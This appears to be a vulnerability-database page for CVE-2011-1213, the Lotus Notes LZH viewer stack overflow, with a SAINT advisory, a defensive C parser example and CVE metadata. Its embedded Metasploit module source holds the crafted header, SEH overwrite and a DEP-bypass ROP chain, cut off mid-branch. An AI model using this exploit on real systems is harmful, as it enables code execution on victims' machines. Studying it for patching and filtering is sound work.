### Background

Lotus Notes is the client for Lotus Domino servers. Attachments opened with the built-in file viewer are rendered by the Autonomy KeyView library that ships with Notes; the **LZH** archive handler in that library (`lzhsr.dll`) is the vulnerable component here.

### Problem

The IBM Lotus Notes file viewer is vulnerable to remote code execution through a stack buffer overflow while parsing the header of an **LZH** archive. The root cause recorded for CVE-2011-1213 (IBM SPR PRAD88MJ2W) is an integer underflow: the parser trusts the one-byte header-size field, a value smaller than the fixed header fields wraps to a very large length, and the copy that follows overruns a stack buffer. The attacker needs no credentials (CVSS 2 vector AV:N/AC:M/Au:N/C:C/I:C/A:C, base score 9.3), but the attack does require user interaction: the target must open the message and view the crafted attachment with the affected viewer, after which the payload runs with that user's privileges. The public Metasploit module (`exploit/windows/lotus/lotusnotes_lzh` delivers the file by SMTP, `exploit/windows/fileformat/lotusnotes_lzh` writes it to disk) uses a header-size byte of 0x08, follows the header with 6741 bytes of filler and overwrites the SEH record for Notes 8.0.x through 8.5.2 FP2; for DEP-enabled 8.5.2 FP2 it instead pivots into a ROP chain built from nnotes.dll and the MSVC runtime DLLs that calls VirtualProtect before the payload.

### Resolution

Apply the patches described in [IBM Bulletin 1500034](https://www-304.ibm.com/support/docview.wss?uid=swg21500034). The CVE entry lists Notes releases before 8.5.2 FP3 as affected, so 8.5.2 FP3 or later carries the fix. Until the fix pack is deployed the trigger is viewing an LZH attachment in the client, so blocking LZH archives at the mail gateway is a workaround.

### References

CVE-2011-1213, BID 48018, OSVDB 72706, <http://secunia.com/advisories/44624/>, iDefense advisory 904 (<http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904>).

### Limitations

SAINT's exploit works on IBM Lotus Notes 8.5 and requires the user to view the **LZH** attachment. A valid e-mail account for the recipient must exist on the mail server and in Lotus Notes, since the crafted file is delivered as a mail attachment.

### Platforms

Windows
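The header-size underflow described under Problem, as an added example in C that is not SAINT's, IBM's or the Metasploit module's code: a level-0 LZH header parser with the unchecked arithmetic beside a hardened version that validates the size field, checksum and name length before any copy, plus a builder for a well-formed header to compare against. The exploit header bytes are copied from the Metasploit module on this page; the subtrahend of 18, the `lzh_*` function names and the return codes are assumptions, and the real lzhsr.dll arithmetic is not on the page (the module's own comment, "8 - 13 = FFFFFFF6", is arithmetically inconsistent, since 8 - 13 wraps to 0xFFFFFFFB; 18 is the value that yields 0xFFFFFFF6).

```c
/* Added example for CVE-2011-1213; not code from SAINT, IBM/Autonomy or the
 * Metasploit module. It models a level-0 LZH header parse that trusts the
 * one-byte header-size field. The Metasploit comment "8 - 13 = FFFFFFF6" is
 * inconsistent (8 - 13 wraps to 0xFFFFFFFB; 0xFFFFFFF6 is 8 - 18), so the 18
 * subtracted below is an assumption picked to reproduce the quoted value. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Level-0 header, offsets from its first byte: 0 header size (bytes after byte 1),
 * 1 checksum, 2 method "-lh0-" (5), 7 packed size LE32, 11 original size LE32,
 * 15 MS-DOS time/date, 19 attribute, 20 level (0), 21 name length, 22 name, then CRC16 LE. */
#define LZH_CONSUMED_BEFORE_LEVEL 18u /* method+packed+original+time+attribute (assumed) */
#define LZH_L0_MIN_SIZE           22u /* 20 fixed bytes after offset 2 plus 2 CRC bytes */

typedef struct { char method[6]; uint32_t packed_size, original_size;
                 char name[256]; uint16_t crc; } lzh_entry;

static uint32_t le32(const uint8_t *p)
{ return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }

/* Level-0 checksum: low byte of the sum of the header_size bytes from offset 2. */
static uint8_t lzh_checksum(const uint8_t *hdr)
{
    unsigned sum = 0;
    for (unsigned i = 0, n = hdr[0]; i < n; i++) sum += hdr[2 + i];
    return (uint8_t)sum;
}

/* Vulnerable arithmetic. Having read through the attribute byte, the parser takes
 * header_size - 18 as the number of header bytes still to copy into a fixed-size
 * stack buffer. header_size = 0x08 wraps to 0xFFFFFFF6; a memcpy of that length is
 * the overflow (the exploit's 6741 filler bytes then reach the SEH record). The
 * length is returned rather than used so this runs safely. */
uint32_t lzh_remaining_unchecked(const uint8_t *hdr)
{
    uint32_t header_size = hdr[0];
    return header_size - LZH_CONSUMED_BEFORE_LEVEL;
}

/* Hardened parse; pass out = NULL to validate only (e.g. in a gateway filter).
 * 0 ok; -1 truncated; -2 header size below the level-0 minimum (the exploit's
 * 0x08 stops here); -3 checksum mismatch; -4 not level 0; -5 name+CRC do not fit. */
int lzh_parse_level0(const uint8_t *buf, size_t len, lzh_entry *out)
{
    if (len < 2) return -1;
    uint32_t header_size = buf[0];
    if (header_size < LZH_L0_MIN_SIZE) return -2;
    if (len < 2u + header_size) return -1;
    if (lzh_checksum(buf) != buf[1]) return -3;
    if (buf[20] != 0) return -4;
    uint32_t name_len = buf[21];
    if (22u + name_len > header_size) return -5;
    if (!out) return 0;
    memcpy(out->method, buf + 2, 5); out->method[5] = '\0';
    out->packed_size   = le32(buf + 7);
    out->original_size = le32(buf + 11);
    memcpy(out->name, buf + 22, name_len); out->name[name_len] = '\0';
    out->crc = (uint16_t)(buf[22 + name_len] | (buf[23 + name_len] << 8));
    return 0;
}

/* Build a well-formed level-0 header for a stored ("-lh0-") member. Returns bytes
 * written, 0 if the name is too long or the buffer too small. */
size_t lzh_build_level0(const char *name, uint32_t size, uint16_t crc, uint8_t *out, size_t cap)
{
    size_t n = strlen(name);
    if (n > 255 || cap < 24 + n) return 0;
    out[0] = (uint8_t)(22 + n);
    memcpy(out + 2, "-lh0-", 5);
    for (int i = 0; i < 4; i++) out[7 + i] = out[11 + i] = (uint8_t)(size >> (8 * i));
    memset(out + 15, 0, 4); out[19] = 0x20; out[20] = 0; out[21] = (uint8_t)n;
    memcpy(out + 22, name, n);
    out[22 + n] = (uint8_t)crc; out[23 + n] = (uint8_t)(crc >> 8);
    out[1] = lzh_checksum(out);
    return 24 + n;
}

/* Header bytes from the Metasploit module on this page (the filler and payload that
 * follow are omitted): header-size byte 0x08, and a checksum that does not match. */
const uint8_t cve_2011_1213_header[31] = {
    0x08, 0x1a, '-', 'l', 'h', '0', '-',
    0x7c, 0x1a, 0x00, 0x00,  0x7c, 0x1a, 0x00, 0x00,  0xb2, 0x5e, 0xab, 0x3c,
    0x20, 0x00, 0x07, 'p', 'o', 'c', '.', 't', 'x', 't',  0x25, 0x7d
};

int main(void)
{
    lzh_entry e;
    uint8_t good[64];
    size_t glen = lzh_build_level0("poc.txt", 0x1a7c, 0x7d25, good, sizeof good);
    printf("unchecked length for the exploit header: 0x%08x\n",
           (unsigned)lzh_remaining_unchecked(cve_2011_1213_header));
    printf("hardened parse of the exploit header: %d\n",
           lzh_parse_level0(cve_2011_1213_header, sizeof cve_2011_1213_header, NULL));
    int rc = lzh_parse_level0(good, glen, &e);
    printf("hardened parse of a well-formed header: %d (name=%s, size=%u)\n",
           rc, e.name, (unsigned)e.original_size);
    return 0;
}
```

Build with `cc -std=c99 -Wall lzh_check.c`. The unchecked function yields 0xfffffff6 for the exploit header, the hardened parser returns -2 for it and 0 (name poc.txt, size 0x1a7c) for the well-formed header built from the same fields. Calling `lzh_parse_level0` with `out = NULL` is the validate-only shape a gateway filter would apply to each attachment; it rejects the exploit header on the size check alone, before the mismatched checksum is even consulted.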
{"type": "saint", "published": "2011-06-30T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:DBF29552A2B2831FD63B43300A740BAB", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1213"]}, {"type": "saint", "idList": ["SAINT:65C4DB0D9DA3A4838F166CB775F21CD1", "SAINT:DA6CACC623FA712AE2036C05A990A0E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102577"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOTUS/LOTUSNOTES_LZH", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/LOTUSNOTES_LZH"]}, {"type": "exploitdb", "idList": ["EDB-ID:17448"]}, {"type": "kaspersky", "idList": ["KLA10202"]}, {"type": "nessus", "idList": ["SYMANTEC_SYM_11-013.NASL", "NOTES_KEYVIEW_OVERFLOWS2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:801945", "OPENVAS:1361412562310801945"]}, {"type": "symantec", "idList": ["SMNTC-1236"]}], "modified": "2019-05-29T17:19:47", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2019-05-29T17:19:47", "rev": 2}, "vulnersScore": 8.3}, "edition": 2, "viewCount": 6, "cvelist": ["CVE-2011-1213"], "references": [], "lastseen": "2019-05-29T17:19:47", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "modified": "2011-06-30T00:00:00", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. 
A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). \n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:00", "description": "Integer underflow in lzhsr.dll in Autonomy KeyView, as used in IBM Lotus Notes before 8.5.2 FP3, allows remote attackers to execute arbitrary code via a crafted header in a .lzh attachment that triggers a stack-based buffer overflow, aka SPR PRAD88MJ2W.", "edition": 6, "cvss3": {}, "published": "2011-05-31T20:55:00", "title": "CVE-2011-1213", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1213"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:ibm:lotus_notes:7.0.2.3", "cpe:/a:ibm:lotus_notes:5.0.1c", "cpe:/a:ibm:lotus_notes:8.5.1", "cpe:/a:ibm:lotus_notes:5.0.1a", "cpe:/a:ibm:lotus_notes:7.0.4", "cpe:/a:ibm:lotus_notes:5.0.11", "cpe:/a:ibm:lotus_notes:4.5", "cpe:/a:ibm:lotus_notes:6.5.4", "cpe:/a:ibm:lotus_notes:6.5.5.2", "cpe:/a:ibm:lotus_notes:6.0.1", "cpe:/a:ibm:lotus_notes:6.5.6.3", "cpe:/a:ibm:lotus_notes:8.5.0.1", "cpe:/a:ibm:lotus_notes:5.0.12", "cpe:/a:ibm:lotus_notes:7.0.2.2", "cpe:/a:ibm:lotus_notes:5.0.9a", "cpe:/a:ibm:lotus_notes:4.6.7a", "cpe:/a:ibm:lotus_notes:8.0.2.6", "cpe:/a:ibm:lotus_notes:8.0.2.0", "cpe:/a:ibm:lotus_notes:5.0.2c", "cpe:/a:ibm:lotus_notes:5.0.6", "cpe:/a:ibm:lotus_notes:6.5", "cpe:/a:ibm:lotus_notes:5.0.2b", "cpe:/a:ibm:lotus_notes:6.5.2", "cpe:/a:ibm:lotus_notes:5.0.4a", "cpe:/a:ibm:lotus_notes:8.5", "cpe:/a:ibm:lotus_notes:8.5.1.4", "cpe:/a:ibm:lotus_notes:3.0", "cpe:/a:ibm:lotus_notes:6.5.6.2", "cpe:/a:ibm:lotus_notes:5.0.5.01", 
"cpe:/a:ibm:lotus_notes:5.0.7", "cpe:/a:ibm:lotus_notes:8.5.2.2", "cpe:/a:ibm:lotus_notes:7.0.3.1", "cpe:/a:ibm:lotus_notes:8.0", "cpe:/a:ibm:lotus_notes:5.0.8", "cpe:/a:ibm:lotus_notes:8.5.2.1", "cpe:/a:ibm:lotus_notes:7.0.4.1", "cpe:/a:ibm:lotus_notes:5.0.2a", "cpe:/a:ibm:lotus_notes:6.0.5", "cpe:/a:ibm:lotus_notes:6.0.3", "cpe:/a:ibm:lotus_notes:3.0.0.1", "cpe:/a:ibm:lotus_notes:7.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.3", "cpe:/a:ibm:lotus_notes:7.0", "cpe:/a:ibm:lotus_notes:8.0.2.3", "cpe:/a:ibm:lotus_notes:5.0.1", "cpe:/a:ibm:lotus_notes:6.5.6.1", "cpe:/a:ibm:lotus_notes:6.5.5.1", "cpe:/a:ibm:lotus_notes:7.0.0", "cpe:/a:ibm:lotus_notes:8.0.2.4", "cpe:/a:ibm:lotus_notes:6.5.1", "cpe:/a:ibm:lotus_notes:6.5.4.1", "cpe:/a:ibm:lotus_notes:7.0.3", "cpe:/a:ibm:lotus_notes:4.2.2", "cpe:/a:ibm:lotus_notes:4.6", "cpe:/a:ibm:lotus_notes:6.5.4.2", "cpe:/a:ibm:lotus_notes:7.0.4.0", "cpe:/a:ibm:lotus_notes:8.0.2", "cpe:/a:ibm:lotus_notes:6.5.5", "cpe:/a:ibm:lotus_notes:8.5.2.0", "cpe:/a:ibm:lotus_notes:5.0.9", "cpe:/a:ibm:lotus_notes:6.5.3.1", "cpe:/a:ibm:lotus_notes:6.0.4", "cpe:/a:ibm:lotus_notes:6.5.5.3", "cpe:/a:ibm:lotus_notes:5.0a", "cpe:/a:ibm:lotus_notes:5.0.1b", "cpe:/a:ibm:lotus_notes:5.0.3", "cpe:/a:ibm:lotus_notes:6.0", "cpe:/a:ibm:lotus_notes:8.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.1", "cpe:/a:ibm:lotus_notes:5.0.2", "cpe:/a:ibm:lotus_notes:4.2", "cpe:/a:ibm:lotus_notes:8.5.1.5", "cpe:/a:ibm:lotus_notes:3.0.0.2", "cpe:/a:ibm:lotus_notes:8.0.0", "cpe:/a:ibm:lotus_notes:8.0.1", "cpe:/a:ibm:lotus_notes:7.0.2", "cpe:/a:ibm:lotus_notes:8.5.1.0", "cpe:/a:ibm:lotus_notes:6.5.6", "cpe:/a:ibm:lotus_notes:7.0.1", "cpe:/a:ibm:lotus_notes:5.0.5.02", "cpe:/a:ibm:lotus_notes:5.0.6a", "cpe:/a:ibm:lotus_notes:5.0.7a", "cpe:/a:ibm:lotus_notes:5.0", "cpe:/a:ibm:lotus_notes:6.0.2", "cpe:/a:ibm:lotus_notes:8.5.1.2", "cpe:/a:ibm:lotus_notes:5.02", "cpe:/a:ibm:lotus_notes:4.2.1", "cpe:/a:ibm:lotus_notes:7.0.1.1", "cpe:/a:ibm:lotus_notes:6.5.3", "cpe:/a:ibm:lotus_notes:5.0.1.02", 
"cpe:/a:ibm:lotus_notes:5.0.4", "cpe:/a:ibm:lotus_notes:5.0.10", "cpe:/a:ibm:lotus_notes:6.5.4.3", "cpe:/a:ibm:lotus_notes:6.0.2.2", "cpe:/a:ibm:lotus_notes:8.5.0.0", "cpe:/a:ibm:lotus_notes:5.0.5", "cpe:/a:ibm:lotus_notes:4.6.7h", "cpe:/a:ibm:lotus_notes:8.0.2.5", "cpe:/a:ibm:lotus_notes:7.0.4.2", "cpe:/a:ibm:lotus_notes:8.0.2.2", "cpe:/a:ibm:lotus_notes:5.0.6a.01"], "id": "CVE-2011-1213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1213", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:lotus_notes:6.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf2:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1b:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.9a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:ibm:lotus_notes:6.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:cf1:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.7a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2c:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf1:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:cf2:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.10:*:*:*:*:*:*:*", 
"cpe:2.3:a:ibm:lotus_notes:8.5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf3:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6.7h:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6a.01:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6.7a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.4a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5.01:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.1.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:23:52", "description": "", "published": "2011-06-25T00:00:00", "type": "packetstorm", "title": "Lotus Notes 8.0.x - 
8.5.2 FP2 - Autonomy Keyview ", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2011-06-25T00:00:00", "id": "PACKETSTORM:102577", "href": "https://packetstormsecurity.com/files/102577/Lotus-Notes-8.0.x-8.5.2-FP2-Autonomy-Keyview.html", "sourceData": "`## \n# $Id: lotusnotes_lzh.rb 13015 2011-06-23 15:43:54Z bannedit $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when \nparsing a malformed, specially crafted LZH file. 
This vulnerability was \ndiscovered binaryhouse.net \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'binaryhouse.net', # original discovery \n'alino <26alino@gmail.com>', # Metasploit module \n], \n'Version' => '$Revision: 13015 $', \n'References' => \n[ \n['CVE', '2011-1213'], \n['OSVDB', '72706'], \n['BID', '48018'], \n['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'], \n['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'], \n], \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Platform' => ['win'], \n'Targets' => \n[ \n[ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal', \n{ \n'Offset' => 6741, \n'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll \n} \n], \n \n[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP', \n{ \n'Offset' => 6745, \n'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll \n} \n], \n], \n'DisclosureDate' => 'May 24 2011', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.lzh']), \n], self.class) \nend \n \ndef exploit \n \nheader = \"\\x08\" # Size of archived file header <-- 8 - 13 = FFFFFFF6 \nheader << \"\\x1a\" # 1 byte Header checksum \nheader << \"-lh0-\" # Method ID (No compression) \nheader << \"\\x7c\\x1a\\x00\\x00\" # Compressed file size \nheader << \"\\x7c\\x1a\\x00\\x00\" # Uncompressed file size \nheader << \"\\xB2\\x5e\\xab\\x3c\" # Original file date/time \nheader << \"\\x20\" # File attribute \nheader << \"\\x00\" # Level identifier \nheader << \"\\x07\" # File name length \nheader << \"poc.txt\" # File name \nheader << \"\\x25\\x7d\" # 16 bit CRC of the uncompressed file \n \nlzh = header \nlzh << rand_text(target['Offset']) \n \nif (target == targets[0]) \n \nlzh << generate_seh_record(target.ret) \nlzh << make_nops(8) \nlzh << payload.encoded \n \nelsif (target == targets[1]) \n \nrop_nop = 
[0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll \n \nrop_gadgets = \n[ \n0x60524404, # POP EAX; RETN nnotes.dll \n0x7c37a140, # VirtualProtect() \n0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll \n0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll \n0x60620001, # POP EBP; RETN nnotes.dll \n0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll \n0x7c34280f, # POP EBX; RETN MSVCR71.dll \n0x00001954, # dwSize \n0x780ea001, # POP ECX; RETN MSVCP60.dll \n0x7c38b000, # lpflOldProtect \n0x60e73200, # POP EDI; RETN nnotes.dll \n0x60e73201, # RETN nnotes.dll \n0x601d5f02, # POP EDX; RETN nnotes.dll \n0x00000040, # flNewProtect \n0x60524404, # POP EAX; RETN nnotes.dll \n0x90909090, # NOP \n0x60820801, # PUSHAD; RETN nnotes.dll \n].pack(\"V*\") \n \nlzh << [target.ret].pack('V') 